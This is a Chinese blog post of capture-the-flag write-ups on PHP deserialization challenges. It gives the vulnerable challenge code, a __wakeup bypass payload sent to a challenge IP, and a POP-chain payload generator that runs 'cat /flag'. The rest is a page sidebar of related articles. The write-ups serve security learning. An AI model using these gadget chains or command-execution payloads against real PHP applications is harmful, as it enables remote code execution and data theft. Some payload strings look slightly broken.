反序列化(unserialize)

已于 2024-03-10 20:20:25 修改
阅读量873 收藏 10
点赞数 34
分类专栏: web 文章标签: 前端 linux 数据库
于 2024-03-05 14:56:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzzob/article/details/136478865
版权

攻防世界

攻防世界 (xctf.org.cn)

unserialize3

__wakeup绕过:可以通过增加对象的属性个数来进行绕过

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=
<?php
class xctf{
    public $flag = '111';
    public function __wakeup(){
        exit('bad requests');
    }
}
$a = new xctf();
echo(serialize($a));
?>

http://61.147.171.105:61734?code=O:4:"xctf":3:{s:4:"flag";s:3:"111";}

 得到flag:cyberpeace{e40f96c8dc00bbd08233834d6c5aa473}

a1natas ctf

PHP_UNSERIALIZE ( 1 )

打开什么都没有

dirsearch

得到php文件 

<?php
class ctf{
    public $name;
    public $type;
    function __construct($name, $type){
        $this->name = "AsaL1n";
        $this->type = "web";
    }
    function __destruct(){
        if($this->name==="newstar"&&$this->type==="winner"){
           $cmd=$_POST['cmd'];
           system($cmd);
        }
    }
}
$hello=$_POST["weber"];
if(isset($hello)){
    unserialize($hello);
}
?>

编写playload

PHP_UNSERIALIZE ( 2 )

<?php
error_reporting(0);
highlight_file(__FILE__);
class ctf{
    public $name;
    public $type;
    function __construct($name, $type){
        $this->name = "AsaL1n";
        $this->type = "web";
    }
    function __destruct(){
        echo md5($this->name);
    }
}
class welcome{
    public $web;
    function __toString()
    {
        $func=$this->web;
        return $func();
    }
}

class world{
    public $flag;
    function __invoke(){
        passthru($this->flag);
    }
}

$hello=$_POST["weber"];
if(isset($hello)){
    unserialize($hello);
}
?>

编写playload: 

<?php
class ctf{
    public $name;
    public $type;
}
class welcome{
    public $web;
}
class world{
    public $flag;
}
$a=new ctf();
$a->name=new welcome();
$a->name->web=new world();
$a->name->web->flag="cat /flag";
echo (serialize($a));
?>

 NSS

[SWPUCTF 2021 新生赛]no_wakeup

<?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

?>
<?php
class HaHaHa{
    public $admin="admin";
    public $passwd="wllm";
}
$a=new HaHaHa();
echo serialize($a);
?>

 

yzzob
关注
  • 34
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
反序列化(未知key反序列化
kosmos1991
06-24 197
目录 1. 序列化 1.1 序列化 2. 反序列化 2.1 反序列化(已知key反序列化) 2.2反序列化(未知key反序列化) github https://github.com/kosmos1991/SerializeAndDeserialize 未知key反序列化 1. 反序列化代码 public dynamic Demo() { var str ...
反序列化(已知key反序列化
kosmos1991
06-24 296
目录 1. 序列化 1.1 序列化 2. 反序列化 2.1 反序列化(已知key反序列化) 2.2反序列化(未知key反序列化) github https://github.com/kosmos1991/SerializeAndDeserialize 已知key反序列化 1. 引用Newtonsoft.Json 2. 根据key创建viewmodel ///...
php unserialize 在线,PHP: unserialize - Manual
weixin_42321086的博客
03-17 816
When you serialize an object of a class from a particular namespace, the namespace is recorded as part of the serialization. If you decide to change this namespace's name, it can be hard to read in ol...
PHP反序列化
weixin_59762059的博客
06-21 2253
PHP反序列化
反序列化工具
json_li的博客
10-11 1796
模仿1024tools.com/unserialize写的反序列化小工具 用了两个文件完成的 话不多说,上源码 js、css文件下载地址 1.serialize.php <?php /** * 序列化 反序列化处理 */ header('content-type:text/html;charset=utf8 '); require_once 'function.php'
反序列化(Unserialize)漏洞详解
热门推荐
qq_49422880的博客
09-28 1万+
序列化和反序列化漏洞分析   序列化(serialize) 就将对象的状态信息转换为可以存储或传输的形式的过程 在序列化期间,对象将当前的状态写入到临时或持久性的存储区 【将状态信息保存为字符串】。   反序列化(unserialize) 就是把序列化之后的字符串在转化为对象。 其实在序列化的过程中是没有任何的漏洞的,产生漏洞的主要的原因就是在反序列化的过程中,通过我们的恶意篡改会产生魔法函数绕过,字符逃逸,远程命令执行等漏洞,最早发现这些漏洞的大佬是真的牛。 一、简单的魔法函数 魔法函数 调用
攻防世界WEB高手进阶区unserialize3,Web_php_unserialize,php_rce
不知名白帽的博客
06-07 1386
攻防世界高手进阶区。unserialize3,Web_php_unserialize,php_rce
unserialize:jQuery 反序列化插件
06-10
反序列化 jQuery 反序列化插件 概述: 这个插件包含两个函数,它们的工作方式与 jQuery 的“serialize()”函数相反。 也就是说,“序列化”采用一种形式(或输入的集合)并为 HTTP 请求返回正确的序列化字符串,此...
详解PHP序列化反序列化的方法
12-19
php 将数据序列化和反序列化其实就用到两个函数,serializeunserialize。 serialize 将数组格式化成有序的字符串 unserialize 将数组还原成数组 例如: $user=array('Moe','Larry','Curly'); $user=serialize($...
解析PHP多种序列化与反序列化的方法
12-17
1. serializeunserialize函数这两个是序列化和反序列化PHP中数据的常用函数。复制代码 代码如下:<?php$a = array(‘a’=> ‘Apple’ ,’b’ => ‘banana’, ‘c’ => ‘Coconut’);//序列化数组$s = serialize...
php中序列化与反序列化详解
01-20
unserialize() 恢复原先变量 eg: $stooges = array('Moe','Larry','Curly'); $new = serialize($stooges); print_r($new);echo ; print_r(unserialize($new)); 结果:a:3:{i:0;s:3:”Moe”;i:1;s:5:”Larry”;i...
PHP 序列化和反序列化函数实例详解
12-20
序列化与反序列化 把复杂的数据类型压缩到一个字符串中 serialize() 把变量和它们的值编码成文本形式 unserialize() 恢复原先变量  1.创建一个$arr数组用于储存用户基本信息,并在浏览器中输出查看结果; $arr=...
JS中一个dom元素能绑定多少事件
ggq53219的博客
06-10 550
在JavaScript中,一个DOM元素可以绑定的事件数量并没有明确的限制,这主要取决于浏览器的实现和内存限制。然而,在实际应用中,为同一个DOM元素绑定过多的事件监听器可能会导致性能问题,尤其是在事件处理函数执行复杂操作的情况下。总之,虽然JavaScript中DOM元素可以绑定的事件数量没有明确的限制,但在实际应用中应注意避免过度绑定和优化事件处理函数,以确保良好的性能和用户体验。
Web前端网站设计案例:深入剖析创意与技术的完美融合
liyrbtqe_66w的博客
06-12 284
在性能优化方面,设计师通过压缩代码、减少HTTP请求、使用CDN等技术手段,提升了网站的加载速度和响应性能,为用户提供了更加流畅的访问体验。综上所述,本Web前端网站设计案例通过视觉设计、用户体验、技术实现、性能优化、创意表达、响应式设计和跨平台兼容等方面的综合考量,成功打造了一款既美观又实用的网站。这个案例充分展示了Web前端设计的魅力和潜力,为未来的网站设计提供了有益的借鉴和启示。设计师通过独特的视觉元素和创意构思,将品牌理念和文化内涵融入其中,使得整个网站在传达信息的同时,也展现出品牌的独特魅力。
Harmony 开发的艺术 面向对象
不懂先生的博客
06-13 1049
然后你可以创建多个子类,如“圆形”、“矩形”和“三角形”,它们都继承自“形状”类并实现了自己的“绘制”方法。尽管每个对象的类型可能不同(圆形、矩形、三角形等),但由于它们都继承了“形状”类并实现了相同的“绘制”方法,因此你可以通过父类引用来统一调用它们的方法。然后你可以创建一个“狗”类,它继承自“动物”类,并添加或覆盖一些特定的属性和方法(如“叫”和“摇尾巴”)。所以面向对象的三大特征(封装、继承、多态)在java语言中很容易实现的设计,搬到早期的JavaScript中,就变噩梦一样的存在。
Web前端设计大赛:创意与技术的碰撞
huejiaqwerty888的博客
06-12 361
在这场竞赛中,参赛者们不仅需要展现出独特的创意,还需要运用精湛的技术将创意转化为实际作品。本文将从四个方面、五个方面、六个方面和七个方面,深入剖析Web前端设计大赛的魅力和挑战。交互设计是Web前端设计的核心环节。参赛者需要关注页面的加载速度、响应速度以及操作的便捷性等方面,确保用户在使用过程中能够获得良好的体验。参赛者需要敢于突破传统的设计理念和技术限制,尝试新的设计手法和技术应用。参赛者需要在创意构思、视觉呈现、交互设计、用户体验、技术实现、性能优化以及创新性和可实践性等方面进行全面考虑和精心打造。
web前端拖拽工具:探索其复杂性、困惑度与爆发度
liyrbtqe_66w的博客
06-12 284
综上所述,Web前端拖拽工具虽然带来了便捷和效率,但同时也伴随着一定的复杂性、困惑度和挑战。对于开发者来说,深入了解拖拽工具的技术原理和应用场景,掌握其使用方法和优化技巧,是提升开发效率和降低项目风险的关键所在。然而,在实际项目中,由于项目需求、技术栈以及团队协作等多种因素的影响,开发者可能会遇到各种复杂的问题和挑战。然而,随着功能的增多和复杂化,开发者在使用拖拽工具时可能会遇到一些困惑和挑战。同时,随着Web组件化、模块化等趋势的普及,拖拽工具也可能会朝着更加标准化、可复用的方向发展。
Web前端写随机抽奖:技术与创意的碰撞
最新发布
yvnmth_025y的博客
06-16 184
这些创意构思不仅能够提升抽奖活动的趣味性和互动性,还能够吸引更多的用户参与。除了基本的抽奖功能和界面设计外,我们还需要关注用户的交互体验。同时,我们还要确保抽奖过程的公平性和透明度,避免出现任何作弊行为。通过构建合理的抽奖逻辑、设计美观的界面、优化交互体验以及拓展创意构思,我们可以为用户带来更加有趣和丰富的抽奖体验。在Web前端的世界里,随机抽奖功能不仅是一种常见的交互元素,更是技术与创意的完美结合。下面,我们将从四个方面、五个方面、六个方面和七个方面,深入探讨Web前端实现随机抽奖的技术要点和创意构思。
SortTable.js + vxe-table 实现多条批量排序
小先生编程
06-12 600
环境: 功能: 实现表格拖动排序,支持单条排序,多条排序 实现思路: 官网只有单条排序的例子,网上也都是简单的使用,想要实现多条排序,就要结合着表格的复选框功能,在对其勾选的行统一计算! 最终效果: 实现代码
PHP序列化和反序列化
09-14
总结一下,PHP序列化和反序列化是将PHP对象转换为可存储或传输的格式以及将已序列化的数据重新恢复为PHP对象的过程,通过serialize()函数和unserialize()函数实现。它们在PHP中广泛应用于对象的存储和传输。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值